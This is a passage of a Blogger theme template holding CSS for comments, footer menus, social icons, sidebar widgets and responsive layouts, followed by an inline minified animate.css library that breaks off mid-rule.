
.comments .comments-content .datetime a {

color:#888;

.comments .comment .comment-actions a {

display:inline-block;

color:#333;

font-weight:bold;

font-size:10px;

line-height:15px;

margin:4px 8px 0 0;

.comments .continue a {

color:#333;

display:inline-block;

font-size:10px;

.comments .comment .comment-actions a:hover, .comments .continue a:hover{

text-decoration:underline;
}

/* ######## Instagram Widget Css ######################### */

/* ######## Footer Css ######################### */

.bot-bar-menu {

background-color: #222;

padding: 20px 0px;

overflow: hidden;

.bot-menu-wrap {

margin: 0 auto;

position:relative;

text-align:center;

.bot-menu {

position: absolute;

left: 0;

top: 8px;

.bot-menu h2 {

display:none;

.bot-menu ul {

overflow: hidden;

list-style: none;

padding: 0;

margin: 0;

.bot-menu ul li {

float: left;
display: inline-block;

list-style: none;

padding: 0;

.bot-menu ul li a {

padding: 10px 16px;

display: block;

border: none !important;

text-decoration: none;

line-height: inherit;

font-size: 14px;

font-weight: normal;

color: #eeeeee;

text-transform: uppercase;

.bot-menu ul li a:hover {

color:$maincolor;

.bottom-bar-social {

position: absolute;

right: 0;

top: 8px;

.bottom-bar-social li {

display: inline;

padding: 0;

float: left;

margin-right: 5px;

.bottom-bar-social .widget ul {
padding: 0;

.bottom-bar-social .LinkList ul {

text-align: center;

.bottom-bar-social #social a {

display: block;

font-size: 14px;

color: #fff;

padding: 10px 5px;

.bottom-bar-social #social a:before {

display: inline-block;

font: normal normal normal 22px/1 FontAwesome;

font-size: inherit;

font-style: normal;

font-weight: 400;

-webkit-font-smoothing: antialiased;

-moz-osx-font-smoothing: grayscale;

.bottom-bar-social .bloglovin:before{content:"\f004"}

.bottom-bar-social .facebook:before{content:"\f09a"}

.bottom-bar-social .twitter:before{content:"\f099"}

.bottom-bar-social .gplus:before{content:"\f0d5"}

.bottom-bar-social .rss:before{content:"\f09e"}

.bottom-bar-social .youtube:before{content:"\f167"}

.bottom-bar-social .skype:before{content:"\f17e"}

.bottom-bar-social .stumbleupon:before{content:"\f1a4"}

.bottom-bar-social .tumblr:before{content:"\f173"}

.bottom-bar-social .vine:before{content:"\f1ca"}

.bottom-bar-social .stack-overflow:before{content:"\f16c"}
.bottom-bar-social .linkedin:before{content:"\f0e1"}

.bottom-bar-social .dribbble:before{content:"\f17d"}

.bottom-bar-social .soundcloud:before{content:"\f1be"}

.bottom-bar-social .behance:before{content:"\f1b4"}

.bottom-bar-social .digg:before{content:"\f1a6"}

.bottom-bar-social .instagram:before{content:"\f16d"}

.bottom-bar-social .pinterest:before{content:"\f0d2"}

.bottom-bar-social .delicious:before{content:"\f1a5"}

.bottom-bar-social .codepen:before{content:"\f1cb"}

.bottom-bar-social ul#social a:hover {

color: $maincolor;

opacity: 1;

.jugas_footer_copyright {

display: inline-block;

color: #fff;

height:52px;

line-height:52px;

.jugas_footer_copyright a {

color:$maincolor;

/* ######## Custom Widget Css ######################### */

.sidebar .FollowByEmail > h3.title,

.sidebar .FollowByEmail .title-wrap {

margin-bottom: 0

.FollowByEmail td {

width: 100%;

float: left;

box-sizing: border-box
}

.FollowByEmail .follow-by-email-inner .follow-by-email-submit {

margin-left: 0;

width: 100%;

border-radius: 0;

height: 30px;

font-size: 11px;

color: #fff;

background-color: $maincolor;

font-family: inherit;

text-transform: uppercase;

font-weight: 700;

letter-spacing: 1px

.FollowByEmail .follow-by-email-inner .follow-by-email-submit:hover {

opacity:0.8;

.FollowByEmail .follow-by-email-inner .follow-by-email-address {

padding-left: 10px;

height: 30px;

border: 1px solid #FFF;

margin-bottom: 5px;

box-sizing: border-box;

font-size: 11px;

font-family: inherit

.FollowByEmail .follow-by-email-inner .follow-by-email-address:focus {

border: 1px solid #FFF

.FollowByEmail .widget-content {

box-sizing: border-box;
padding: 10px

.FollowByEmail .widget-content:before {

content: "Enter your email address to subscribe to this blog and receive notifications of new posts by
email.";

font-size: 14px;

color: #f2f2f2;

line-height: 1.4em;

margin-bottom: 5px;

display: block;

padding: 0 2px

.item #ads-home {

margin-top: 20px;

.cloud-label-widget-content {

display: inline-block;

text-align: left;

.cloud-label-widget-content .label-size {

display: inline-block;

float: left;

font-size: 16px;

line-height: normal;

margin: 0 5px 5px 0;

opacity: 1

.cloud-label-widget-content .label-size a {

background: #f8f8f8;

color: #878787;

float: left;
font-weight: 400;

line-height: 100%;

margin: 0;

padding: 7px 8px;

text-transform: capitalize;

transition: all .6s;

-webkit-border-radius: 2px;

-moz-border-radius: 2px;

border-radius: 2px;

.lowerbar .cloud-label-widget-content .label-size a {

background:#3B3B3B;

.cloud-label-widget-content .label-size a:hover,

.cloud-label-widget-content .label-size a:active {

background: $maincolor;

color: #fff;

.cloud-label-widget-content .label-size .label-count {

background: $maincolor;

color: #fff;

white-space: nowrap;

display: inline-block;

padding: 6px 8px;

margin-left: -3px;

line-height: normal;

border-radius: 0 2px 2px 0

.label-size-1,

.label-size-2 {

opacity: 100
}

.list-label-widget-content li {

display: block;

padding: 8px 0;

position: relative

.list-label-widget-content li a:before {

content: '\203a';

position: absolute;

left: 0px;

top: 8px;

font-size: 22px;

color: $maincolor

.lowerbar .list-label-widget-content li a {

color:#fff;

.list-label-widget-content li a {

color: #0a0a0a;

font-size: 16px;

padding-left: 20px;

font-weight: 400;

text-transform: capitalize;

.list-label-widget-content li span:last-child {

color: $maincolor;

font-size: 12px;

font-weight: 700;

position: absolute;

top: 9px;

right: 0
}

.PopularPosts .item-thumbnail {

margin: 0 15px 0 0 !important;

width: 90px;

height: 65px;

float: left;

overflow: hidden;

position: relative

.PopularPosts .item-thumbnail a {

position: relative;

display: block;

overflow: hidden;

line-height: 0

.PopularPosts ul li img {

width: 90px;

height: 65px;

object-fit: cover;

padding: 0;

transition: all .3s ease

.PopularPosts .widget-content ul li {

overflow: hidden;

padding: 10px 0;

border-top: 1px solid #f2f2f2

.sidebar .PopularPosts .widget-content ul li:first-child,

.sidebar .custom-widget li:first-child,

.tab-widget .PopularPosts .widget-content ul li:first-child,

.tab-widget .custom-widget li:first-child {


padding-top: 0;

border-top: 0

.sidebar .PopularPosts .widget-content ul li:last-child,

.sidebar .custom-widget li:last-child,

.tab-widget .PopularPosts .widget-content ul li:last-child,

.tab-widget .custom-widget li:last-child {

padding-bottom: 0

.PopularPosts ul li a {

color: #0a0a0a;

font-weight: 400;

font-size: 13px;

line-height: 1.4em;

transition: color .3s;

.PopularPosts ul li a:hover {

color: $maincolor

.PopularPosts .item-title {

margin: 0 0 4px;

padding: 0;

line-height: 0

.item-snippet {

display: none;

font-size: 0;

padding-top: 0

.PopularPosts ul {

counter-reset: popularcount;
margin: 0;

padding: 0;

.PopularPosts .item-thumbnail::before {

background: rgba(0, 0, 0, 0.3);

bottom: 0px;

content: "";

height: 100px;

width: 100px;

left: 0px;

right: 0px;

margin: 0px auto;

position: absolute;

z-index: 3;

.BlogArchive ul li {

margin-bottom: 7px !important;

padding-bottom: 7px;

.BlogArchive ul li:last-child {

margin-bottom: 0;

padding-bottom: 0;

border-bottom: none;

.BlogArchive ul li a {

color:#0a0a0a;

.BlogArchive ul li a:hover {

color:$maincolor;

.BlogArchive .zippy {
color:#e74c3c;

.BlogArchive .post-count-link {

font-weight:700;

.BlogArchive ul .posts a {

.BlogArchive select {

width: 100%;

padding: 10px;

border-color: #777;

/* ######## Responsive Css ######################### */

@media only screen and (max-width: 1200px) {

.featured-slider-wrap {

width:auto !important;

.sora-author-box-text {

padding: 30px 70px 0 0;

.row {

width: 100%;

margin: 0 auto;

float: none;

padding-left: 10px !important;

padding-right: 10px !important;

box-sizing: border-box;

.index .post-grid-item, .archive .post-grid-item {

width: 33.33%;

}
.index .post-grid-item:nth-child(3n), .archive .post-grid-item:nth-child(3n) {

padding-right: 0;

.index .post-grid-item:nth-child(4n), .archive .post-grid-item:nth-child(4n) {

padding-right: 15px;

@media only screen and (max-width: 1100px) {

.sora-author-box-text {

padding: 15px 0 0 0;

.sora-author-box img {

margin-right: 40px;

max-width: 400px;

div#sora_blogger_cntct_form .wrap-me {

max-width: 500px;

float: none;

clear: both;

margin: 0 auto 20px;

width: 100%;

.map-me {

max-width: 500px;

float: none;

clear: both;

margin: 0 auto;

width: 100%;

@media only screen and (max-width: 980px) {


.item #main-wrapper, .statc_page #main-wrapper, .item #sidebar-wrapper, .statc_page #sidebar-
wrapper {

float: none;

clear: both;

width: 100%;

margin: 0 auto;

#main-wrapper {

max-width: 100%;

#sidebar-wrapper {

padding-top: 20px;

#nav1, #nav {

display: none;

.slicknav_menu {

display: block;

.item .tm-menu .slicknav_menu, .static_page .tm-menu .slicknav_menu, .error_page {

display:block;

.tm-menu, #menu {

height: auto;

.item .tm-menu, .static_page .tm-menu, .error_page .tm-menu {

float:none;

display:block;

}
@media screen and (max-width: 880px) {

.index .post-grid-item, .archive .post-grid-item {

width: 32%;

.home #header-wrapper {

margin-bottom: 10px;

.item #content-wrapper {

padding: 0 0 30px;

.skills, .skill-details {

width: 100%;

float: none;

padding: 20px;

clear: both;

.hero-row {

width: 100%;

@media only screen and (max-width: 768px) {

.sora-author-box img {

margin-right: 0;

max-width: 100%;

float: none;

width: 100%;

height: auto;

clear: both;

.special-tiles {

width: 50%;
}

.map-me .con-list li {

width: 100%;

float: none;

clear: both;

.tysum .ty-feat .tybox-rest {

width: 50%;

.tysum .ty-feat .tybox-rest:nth-child(2n) {

padding-right: 0;

.sora-author-box-image {

width: 100%;

float: none;

margin-right: 0;

margin-bottom: 10px;

.sora-author-box img {

margin-right: 0;

max-width: 100%;

float: none;

width: 100%;

height: auto;

clear: both;

.sora-author-box {

padding: 10px;

.sora-author-box-text {

padding: 10px;
text-align: center;

.counter-box-item, .works-tiles {

width: 50%;

#header h1 {

font-size: 50px;

.index .post-grid-item:nth-child(3n), .archive .post-grid-item:nth-child(3n) {

padding-right: 0;

.index .post-grid-item:nth-child(4n), .archive .post-grid-item:nth-child(4n) {

padding-right: 0;

.index .post-grid-item, .archive .post-grid-item {

width: 100%;

padding-right: 0;

.tm-menu {

text-align: center;

.top-bar-social {

float: none;

width: 100%;

clear: both;

overflow: hidden;

.top-bar-social li {

display: inline-block;

float: none;
}

.flickity-prev-next-button {

display:none;

.bot-menu, .bottom-bar-social {

float: none;

width: 100%;

clear: both;

overflow: hidden;

position: static;

.bot-menu ul {

text-align:center;

.bot-menu ul li {

float: none;

.bottom-bar-social li {

float: none;

display: inline-block;

.related li {

width: 31%;

.share-art span {

display: none;

.ops-404 {

width: 80%!important;

.title-404 {
font-size: 160px!important;

#header {

padding: 10px 0px 0;

@media only screen and (max-width: 767px) {

#header {

padding: 0;

#header h1 {

font-size: 30px;

.header-text p {

font-size: 30px;

.slide-in {

display:none;

@media only screen and (max-width: 480px) {

.slide-in {

display:block;

.special-tiles, .works-tiles, .about-tiles, .counter-box-item {

width: 100%;

.tysum .ty-feat .tybox-rest {

width: 100%;

clear:both;

padding:0;
}

#header h1 {

font-size: 30px;

.header-text p {

font-size: 20px;

.header-logo-desc span, .header-logo-desc p {

font-size: 16px;

.index .post h2,.archive .post h2, .sora-slide .ty-bonos-entry a, #first-post .post h2 {

line-height: 34px;

font-size: 23px;

h1.post-title {

font-size: 22px;

margin-bottom: 10px;

#sidebar-wrapper {

max-width: 100%;

.share-title {

display: none;

.share-art {

float: none;

text-align: center;

.related li {

width: 100%;

margin:0 auto;
}

.index .post-outer {

padding: 0 0 5x;

@media only screen and (max-width: 360px) {

.title-404 {

font-size: 150px!important;

.header-logo-desc p {

font-size: 100%;

#header h1 {

font-size: 250%;

@media only screen and (max-width: 300px) {

#sidebar-wrapper, .feat-slider-wrap {display:none}

.archive .post h2,.index .post h2, #first-post .post h2 {

line-height: 29px!important;

font-size: 15px!important;

article {

overflow: hidden;

#blog-pager {

padding: 0;

margin: 0;

.index .snippets,.archive .snippets {

display: none;
}

.share-art, .share-box .post-author {

float: none !important;

margin: 0 auto;

text-align: center;

clear: both;

.read-more-wrap, .post-labels {

float: none !important;

clear: both;

display: block;

text-align: center;

.ops-404 {

font-size: 20px!important;

.title-404 {

font-size: 120px!important;

h1.post-title {

font-size: 17px;

.share-box {

overflow: hidden;

.top-bar-social #social a {

width: 24px;

height: 24px;

line-height: 24px;

.second-meta .share-art a {
padding: 5px;

.comments .avatar-image-container {

display: none;

.comments .comment-block {

margin-left: 0 !important;

position: relative;

]]></b:skin>

<b:if cond='data:blog.url == data:blog.homepageUrl'>

<style>

/*!

* animate.css -http://daneden.me/animate

* Version - 3.5.2

* Licensed under the MIT license - http://opensource.org/licenses/MIT

* Copyright (c) 2017 Daniel Eden

*/

.animated{animation-duration:1s;animation-fill-mode:both}.animated.infinite{animation-iteration-
count:infinite}.animated.hinge{animation-
duration:2s}.animated.bounceIn,.animated.bounceOut,.animated.flipOutX,.animated.flipOutY{anima
tion-duration:.75s}@keyframes bounce{0%,20%,53%,80%,to{animation-timing-function:cubic-
bezier(.215,.61,.355,1);transform:translateZ(0)}40%,43%{animation-timing-function:cubic-
bezier(.755,.05,.855,.06);transform:translate3d(0,-30px,0)}70%{animation-timing-function:cubic-
bezier(.755,.05,.855,.06);transform:translate3d(0,-15px,0)}90%{transform:translate3d(0,-
4px,0)}}.bounce{animation-name:bounce;transform-origin:center bottom}@keyframes
flash{0%,50%,to{opacity:1}25%,75%{opacity:0}}.flash{animation-name:flash}@keyframes pulse{0%
{transform:scaleX(1)}50%
{transform:scale3d(1.05,1.05,1.05)}to{transform:scaleX(1)}}.pulse{animation-
name:pulse}@keyframes rubberBand{0%{transform:scaleX(1)}30%
{transform:scale3d(1.25,.75,1)}40%{transform:scale3d(.75,1.25,1)}50%
{transform:scale3d(1.15,.85,1)}65%{transform:scale3d(.95,1.05,1)}75%
{transform:scale3d(1.05,.95,1)}to{transform:scaleX(1)}}.rubberBand{animation-
name:rubberBand}@keyframes shake{0%,to{transform:translateZ(0)}10%,30%,50%,70%,90%
{transform:translate3d(-10px,0,0)}20%,40%,60%,80%
{transform:translate3d(10px,0,0)}}.shake{animation-name:shake}@keyframes headShake{0%
{transform:translateX(0)}6.5%{transform:translateX(-6px) rotateY(-9deg)}18.5%
{transform:translateX(5px) rotateY(7deg)}31.5%{transform:translateX(-3px) rotateY(-5deg)}43.5%
{transform:translateX(2px) rotateY(3deg)}50%{transform:translateX(0)}}.headShake{animation-
timing-function:ease-in-out;animation-name:headShake}@keyframes swing{20%
{transform:rotate(15deg)}40%{transform:rotate(-10deg)}60%{transform:rotate(5deg)}80%
{transform:rotate(-5deg)}to{transform:rotate(0deg)}}.swing{transform-origin:top center;animation-
name:swing}@keyframes tada{0%{transform:scaleX(1)}10%,20%{transform:scale3d(.9,.9,.9) rotate(-
3deg)}30%,50%,70%,90%{transform:scale3d(1.1,1.1,1.1) rotate(3deg)}40%,60%,80%
{transform:scale3d(1.1,1.1,1.1) rotate(-3deg)}to{transform:scaleX(1)}}.tada{animation-
name:tada}@keyframes wobble{0%{transform:none}15%{transform:translate3d(-25%,0,0) rotate(-
5deg)}30%{transform:translate3d(20%,0,0) rotate(3deg)}45%{transform:translate3d(-15%,0,0)
rotate(-3deg)}60%{transform:translate3d(10%,0,0) rotate(2deg)}75%{transform:translate3d(-5%,0,0)
rotate(-1deg)}to{transform:none}}.wobble{animation-name:wobble}@keyframes
jello{0%,11.1%,to{transform:none}22.2%{transform:skewX(-12.5deg) skewY(-12.5deg)}33.3%
{transform:skewX(6.25deg) skewY(6.25deg)}44.4%{transform:skewX(-3.125deg) skewY(-
3.125deg)}55.5%{transform:skewX(1.5625deg) skewY(1.5625deg)}66.6%
{transform:skewX(-.78125deg) skewY(-.78125deg)}77.7%{transform:skewX(.390625deg)
skewY(.390625deg)}88.8%{transform:skewX(-.1953125deg) skewY(-.1953125deg)}}.jello{animation-
name:jello;transform-origin:center}@keyframes bounceIn{0%,20%,40%,60%,80%,to{animation-
timing-function:cubic-bezier(.215,.61,.355,1)}0%{opacity:0;transform:scale3d(.3,.3,.3)}20%
{transform:scale3d(1.1,1.1,1.1)}40%{transform:scale3d(.9,.9,.9)}60%
{opacity:1;transform:scale3d(1.03,1.03,1.03)}80%
{transform:scale3d(.97,.97,.97)}to{opacity:1;transform:scaleX(1)}}.bounceIn{animation-
name:bounceIn}@keyframes bounceInDown{0%,60%,75%,90%,to{animation-timing-function:cubic-
bezier(.215,.61,.355,1)}0%{opacity:0;transform:translate3d(0,-3000px,0)}60%
{opacity:1;transform:translate3d(0,25px,0)}75%{transform:translate3d(0,-10px,0)}90%
{transform:translate3d(0,5px,0)}to{transform:none}}.bounceInDown{animation-
name:bounceInDown}@keyframes bounceInLeft{0%,60%,75%,90%,to{animation-timing-
function:cubic-bezier(.215,.61,.355,1)}0%{opacity:0;transform:translate3d(-3000px,0,0)}60%
{opacity:1;transform:translate3d(25px,0,0)}75%{transform:translate3d(-10px,0,0)}90%
{transform:translate3d(5px,0,0)}to{transform:none}}.bounceInLeft{animation-
name:bounceInLeft}@keyframes bounceInRight{0%,60%,75%,90%,to{animation-timing-
function:cubic-bezier(.215,.61,.355,1)}0%{opacity:0;transform:translate3d(3000px,0,0)}60%
{opacity:1;transform:translate3d(-25px,0,0)}75%{transform:translate3d(10px,0,0)}90%
{transform:translate3d(-5px,0,0)}to{transform:none}}.bounceInRight{animation-
name:bounceInRight}@keyframes bounceInUp{0%,60%,75%,90%,to{animation-timing-
function:cubic-bezier(.215,.61,.355,1)}0%{opacity:0;transform:translate3d(0,3000px,0)}60%
{opacity:1;transform:translate3d(0,-20px,0)}75%{transform:translate3d(0,10px,0)}90%
{transform:translate3d(0,-5px,0)}to{transform:translateZ(0)}}.bounceInUp{animation-
name:bounceInUp}@keyframes bounceOut{20%{transform:scale3d(.9,.9,.9)}50%,55%
{opacity:1;transform:scale3d(1.1,1.1,1.1)}to{opacity:0;transform:scale3d(.3,.3,.3)}}.bounceOut{anim
ation-name:bounceOut}@keyframes bounceOutDown{20%
{transform:translate3d(0,10px,0)}40%,45%{opacity:1;transform:translate3d(0,-
20px,0)}to{opacity:0;transform:translate3d(0,2000px,0)}}.bounceOutDown{animation-
name:bounceOutDown}@keyframes bounceOutLeft{20%
{opacity:1;transform:translate3d(20px,0,0)}to{opacity:0;transform:translate3d(-
2000px,0,0)}}.bounceOutLeft{animation-name:bounceOutLeft}@keyframes bounceOutRight{20%
{opacity:1;transform:translate3d(-
20px,0,0)}to{opacity:0;transform:translate3d(2000px,0,0)}}.bounceOutRight{animation-
name:bounceOutRight}@keyframes bounceOutUp{20%{transform:translate3d(0,-10px,0)}40%,45%
{opacity:1;transform:translate3d(0,20px,0)}to{opacity:0;transform:translate3d(0,-
2000px,0)}}.bounceOutUp{animation-name:bounceOutUp}@keyframes fadeIn{0%
{opacity:0}to{opacity:1}}.fadeIn{animation-name:fadeIn}@keyframes fadeInDown{0%
{opacity:0;transform:translate3d(0,-100%,0)}to{opacity:1;transform:none}}.fadeInDown{animation-
name:fadeInDown}@keyframes fadeInDownBig{0%{opacity:0;transform:translate3d(0,-
2000px,0)}to{opacity:1;transform:none}}.fadeInDownBig{animation-
name:fadeInDownBig}@keyframes fadeInLeft{0%{opacity:0;transform:translate3d(-
100%,0,0)}to{opacity:1;transform:none}}.fadeInLeft{animation-name:fadeInLeft}@keyframes
fadeInLeftBig{0%{opacity:0;transform:translate3d(-
2000px,0,0)}to{opacity:1;transform:none}}.fadeInLeftBig{animation-
name:fadeInLeftBig}@keyframes fadeInRight{0%
{opacity:0;transform:translate3d(100%,0,0)}to{opacity:1;transform:none}}.fadeInRight{animation-
name:fadeInRight}@keyframes fadeInRightBig{0%
{opacity:0;transform:translate3d(2000px,0,0)}to{opacity:1;transform:none}}.fadeInRightBig{animati
on-name:fadeInRightBig}@keyframes fadeInUp{0%
{opacity:0;transform:translate3d(0,100%,0)}to{opacity:1;transform:none}}.fadeInUp{animation-
name:fadeInUp}@keyframes fadeInUpBig{0%
{opacity:0;transform:translate3d(0,2000px,0)}to{opacity:1;transform:none}}.fadeInUpBig{animation-
name:fadeInUpBig}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}.fadeOut{animation-
name:fadeOut}@keyframes fadeOutDown{0%
{opacity:1}to{opacity:0;transform:translate3d(0,100%,0)}}.fadeOutDown{animation-
name:fadeOutDown}@keyframes fadeOutDownBig{0%
{opacity:1}to{opacity:0;transform:translate3d(0,2000px,0)}}.fadeOutDownBig{animation-
name:fadeOutDownBig}@keyframes fadeOutLeft{0%{opacity:1}to{opacity:0;transform:translate3d(-
100%,0,0)}}.fadeOutLeft{animation-name:fadeOutLeft}@keyframes fadeOutLeftBig{0%
{opacity:1}to{opacity:0;transform:translate3d(-2000px,0,0)}}.fadeOutLeftBig{animation-
name:fadeOutLeftBig}@keyframes fadeOutRight{0%
{opacity:1}to{opacity:0;transform:translate3d(100%,0,0)}}.fadeOutRight{animation-
name:fadeOutRight}@keyframes fadeOutRightBig{0%
{opacity:1}to{opacity:0;transform:translate3d(2000px,0,0)}}.fadeOutRightBig{animation-
name:fadeOutRightBig}@keyframes fadeOutUp{0%{opacity:1}to{opacity:0;transform:translate3d(0,-
100%,0)}}.fadeOutUp{animation-name:fadeOutUp}@keyframes fadeOutUpBig{0%
{opacity:1}to{opacity:0;transform:translate3d(0,-2000px,0)}}.fadeOutUpBig{animation-
name:fadeOutUpBig}@keyframes flip{0%{transform:perspective(400px) rotateY(-1turn);animation-
timing-function:ease-out}40%{transform:perspective(400px) translateZ(150px) rotateY(-
190deg);animation-timing-function:ease-out}50%{transform:perspective(400px) translateZ(150px)
rotateY(-170deg);animation-timing-function:ease-in}80%{transform:perspective(400px)
scale3d(.95,.95,.95);animation-timing-function:ease-in}to{transform:perspective(400px);animation-
timing-function:ease-in}}.animated.flip{-webkit-backface-visibility:visible;backface-
visibility:visible;animation-name:flip}@keyframes flipInX{0%{transform:perspective(400px)
rotateX(90deg);animation-timing-function:ease-in;opacity:0}40%{transform:perspective(400px)
rotateX(-20deg);animation-timing-function:ease-in}60%{transform:perspective(400px)
rotateX(10deg);opacity:1}80%{transform:perspective(400px) rotateX(-
5deg)}to{transform:perspective(400px)}}.flipInX{-webkit-backface-visibility:visible!
important;backface-visibility:visible!important;animation-name:flipInX}@keyframes flipInY{0%
{transform:perspective(400px) rotateY(90deg);animation-timing-function:ease-in;opacity:0}40%
{transform:perspective(400px) rotateY(-20deg);animation-timing-function:ease-in}60%
{transform:perspective(400px) rotateY(10deg);opacity:1}80%{transform:perspective(400px)
rotateY(-5deg)}to{transform:perspective(400px)}}.flipInY{-webkit-backface-visibility:visible!
important;backface-visibility:visible!important;animation-name:flipInY}@keyframes flipOutX{0%
{transform:perspective(400px)}30%{transform:perspective(400px) rotateX(-
20deg);opacity:1}to{transform:perspective(400px) rotateX(90deg);opacity:0}}.flipOutX{animation-
name:flipOutX;-webkit-backface-visibility:visible!important;backface-visibility:visible!
important}@keyframes flipOutY{0%{transform:perspective(400px)}30%
{transform:perspective(400px) rotateY(-15deg);opacity:1}to{transform:perspective(400px)
rotateY(90deg);opacity:0}}.flipOutY{-webkit-backface-visibility:visible!important;backface-
visibility:visible!important;animation-name:flipOutY}@keyframes lightSpeedIn{0%
{transform:translate3d(100%,0,0) skewX(-30deg);opacity:0}60%
{transform:skewX(20deg);opacity:1}80%{transform:skewX(-
5deg);opacity:1}to{transform:none;opacity:1}}.lightSpeedIn{animation-
name:lightSpeedIn;animation-timing-function:ease-out}@keyframes lightSpeedOut{0%
{opacity:1}to{transform:translate3d(100%,0,0) skewX(30deg);opacity:0}}.lightSpeedOut{animation-
name:lightSpeedOut;animation-timing-function:ease-in}@keyframes rotateIn{0%{transform-
origin:center;transform:rotate(-200deg);opacity:0}to{transform-
origin:center;transform:none;opacity:1}}.rotateIn{animation-name:rotateIn}@keyframes
rotateInDownLeft{0%{transform-origin:left bottom;transform:rotate(-45deg);opacity:0}to{transform-
origin:left bottom;transform:none;opacity:1}}.rotateInDownLeft{animation-
name:rotateInDownLeft}@keyframes rotateInDownRight{0%{transform-origin:right
bottom;transform:rotate(45deg);opacity:0}to{transform-origin:right
bottom;transform:none;opacity:1}}.rotateInDownRight{animation-
name:rotateInDownRight}@keyframes rotateInUpLeft{0%{transform-origin:left
bottom;transform:rotate(45deg);opacity:0}to{transform-origin:left
bottom;transform:none;opacity:1}}.rotateInUpLeft{animation-name:rotateInUpLeft}@keyframes
rotateInUpRight{0%{transform-origin:right bottom;transform:rotate(-90deg);opacity:0}to{transform-
origin:right bottom;transform:none;opacity:1}}.rotateInUpRight{animation-
name:rotateInUpRight}@keyframes rotateOut{0%{transform-origin:center;opacity:1}to{transform-
origin:center;transform:rotate(200deg);opacity:0}}.rotateOut{animation-
name:rotateOut}@keyframes rotateOutDownLeft{0%{transform-origin:left
bottom;opacity:1}to{transform-origin:left
bottom;transform:rotate(45deg);opacity:0}}.rotateOutDownLeft{animation-
name:rotateOutDownLeft}@keyframes rotateOutDownRight{0%{transform-origin:right
bottom;opacity:1}to{transform-origin:right bottom;transform:rotate(-
45deg);opacity:0}}.rotateOutDownRight{animation-name:rotateOutDownRight}@keyframes
rotateOutUpLeft{0%{transform-origin:left bottom;opacity:1}to{transform-origin:left
bottom;transform:rotate(-45deg);opacity:0}}.rotateOutUpLeft{animation-
name:rotateOutUpLeft}@keyframes rotateOutUpRight{0%{transform-origin:right
bottom;opacity:1}to{transform-origin:right
bottom;transform:rotate(90deg);opacity:0}}.rotateOutUpRight{animation-
name:rotateOutUpRight}@keyframes hinge{0%{transform-origin:top left;animation-timing-
function:ease-in-out}20%,60%{transform:rotate(80deg);transform-origin:top left;animation-timing-
function:ease-in-out}40%,80%{transform:rotate(60deg);transform-origin:top left;animation-timing-
function:ease-in-out;opacity:1}to{transform:translate3d(0,700px,0);opacity:0}}.hinge{animation-
name:hinge}@keyframes jackInTheBox{0%{opacity:0;transform:scale(.1) rotate(30deg);transform-
origin:center bottom}50%{transform:rotate(-10deg)}70%
{transform:rotate(3deg)}to{opacity:1;transform:scale(1)}}.jackInTheBox{animation-
name:jackInTheBox}@keyframes rollIn{0%{opacity:0;transform:translate3d(-100%,0,0) rotate(-
120deg)}to{opacity:1;transform:none}}.rollIn{animation-name:rollIn}@keyframes rollOut{0%
{opacity:1}to{opacity:0;transform:translate3d(100%,0,0) rotate(120deg)}}.rollOut{animation-
name:rollOut}@keyframes zoomIn{0%{opacity:0;transform:scale3d(.3,.3,.3)}50%
{opacity:1}}.zoomIn{animation-name:zoomIn}@keyframes zoomInDown{0%
{opacity:0;transform:scale3d(.1,.1,.1) translate3d(0,-1000px,0);animation-timing-function:cubic-
bezier(.55,.055,.675,.19)}60%{opacity:1;transform:scale3d(.475,.475,.475)
translate3d(0,60px,0);animation-timing-function:cubic-
bezier(.175,.885,.32,1)}}.zoomInDown{animation-name:zoomInDown}@keyframes zoomInLeft{0%
{opacity:0;transform:scale3d(.1,.1,.1) translate3d(-1000px,0,0);animation-timing-function:cubic-
bezier(.55,.055,.675,.19)}60%{opacity:1;transform:scale3d(.475,.475,.475)
translate3d(10px,0,0);animation-timing-function:cubic-
bezier(.175,.885,.32,1)}}.zoomInLeft{animation-name:zoomInLeft}@keyframes zoomInRight{0%
{opacity:0;transform:scale3d(.1,.1,.1) translate3d(1000px,0,0);animation-timing-function:cubic-
bezier(.55,.055,.675,.19)}60%{opacity:1;transform:scale3d(.475,.475,.475) translate3d(-
10px,0,0);animation-timing-function:cubic-bezier(.175,.885,.32,1)}}.zoomInRight{animation-
name:zoomInRight}@keyframes zoomInUp{0%{opacity:0;transform:scale3d(.1,.1,.1)
translate3d(0,1000px,0);animation-timing-function:cubic-bezier(.55,.055,.675,.19)}60%
{opacity:1;transform:scale3d(.475,.475,.475) translate3d(0,-60px,0);animation-timing-
function:cubic-bezier(.175,.885,.32,1)}}.zoomInUp{animation-name:zoomInUp}@keyframes
zoomOut{0%{opacity:1}50%
{opacity:0;transform:scale3d(.3,.3,.3)}to{opacity:0}}.zoomOut{animation-
name:zoomOut}@keyframes zoomOutDown{40%{opacity:1;transform:scale3d(.475,.475,.475)
translate3d(0,-60px,0);animation-timing-function:cubic-
bezier(.55,.055,.675,.19)}to{opacity:0;transform:scale3d(.1,.1,.1) translate3d(0,2000px,0);transform-
origin:center bottom;animation-timing-function:cubic-
bezier(.175,.885,.32,1)}}.zoomOutDown{animation-name:zoomOutDown}@keyframes
zoomOutLeft{40%{opacity:1;transform:scale3d(.475,.475,.475)
translate3d(42px,0,0)}to{opacity:0;transform:scale(.1) translate3d(-2000px,0,0);transform-origin:left
center}}.zoomOutLeft{animation-name:zoomOutLeft}@keyframes zoomOutRight{40%
{opacity:1;transform:scale3d(.475,.475,.475) translate3d(-42px,0,0)}to{opacity:0;transform:scale(.1)
translate3d(2000px,0,0);transform-origin:right center}}.zoomOutRight{animation-
name:zoomOutRight}@keyframes zoomOutUp{40%{opacity:1;transform:scale3d(.475,.475,.475)
translate3d(0,60px,0);animation-timing-function:cubic-
bezier(.55,.055,.675,.19)}to{opacity:0;transform:scale3d(.1,.1,.1) translate3d(0,-
2000px,0);transform-origin:center bottom;animation-timing-function:cubic-
bezier(.175,.885,.32,1)}}.zoomOutUp{animation-name:zoomOutUp}@keyframes slideInDown{0%
{transform:translate3d(0,-
100%,0);visibility:visible}to{transform:translateZ(0)}}.slideInDown{animation-
name:slideInDown}@keyframes slideInLeft{0%{transform:translate3d(-
100%,0,0);visibility:visible}to{transform:translateZ(0)}}.slideInLeft{animation-
name:slideInLeft}@keyframes slideInRight{0%
{transform:translate3d(100%,0,0);visibility:visible}to{transform:translateZ(0)}}.slideInRight{animatio
n-name:slideInRight}@keyframes slideInUp{0%
{transform:translate3d(0,100%,0);visibility:visible}to{transform:translateZ(0)}}.slideInUp{animation-
name:slideInUp}@keyframes slideOutDown{0%
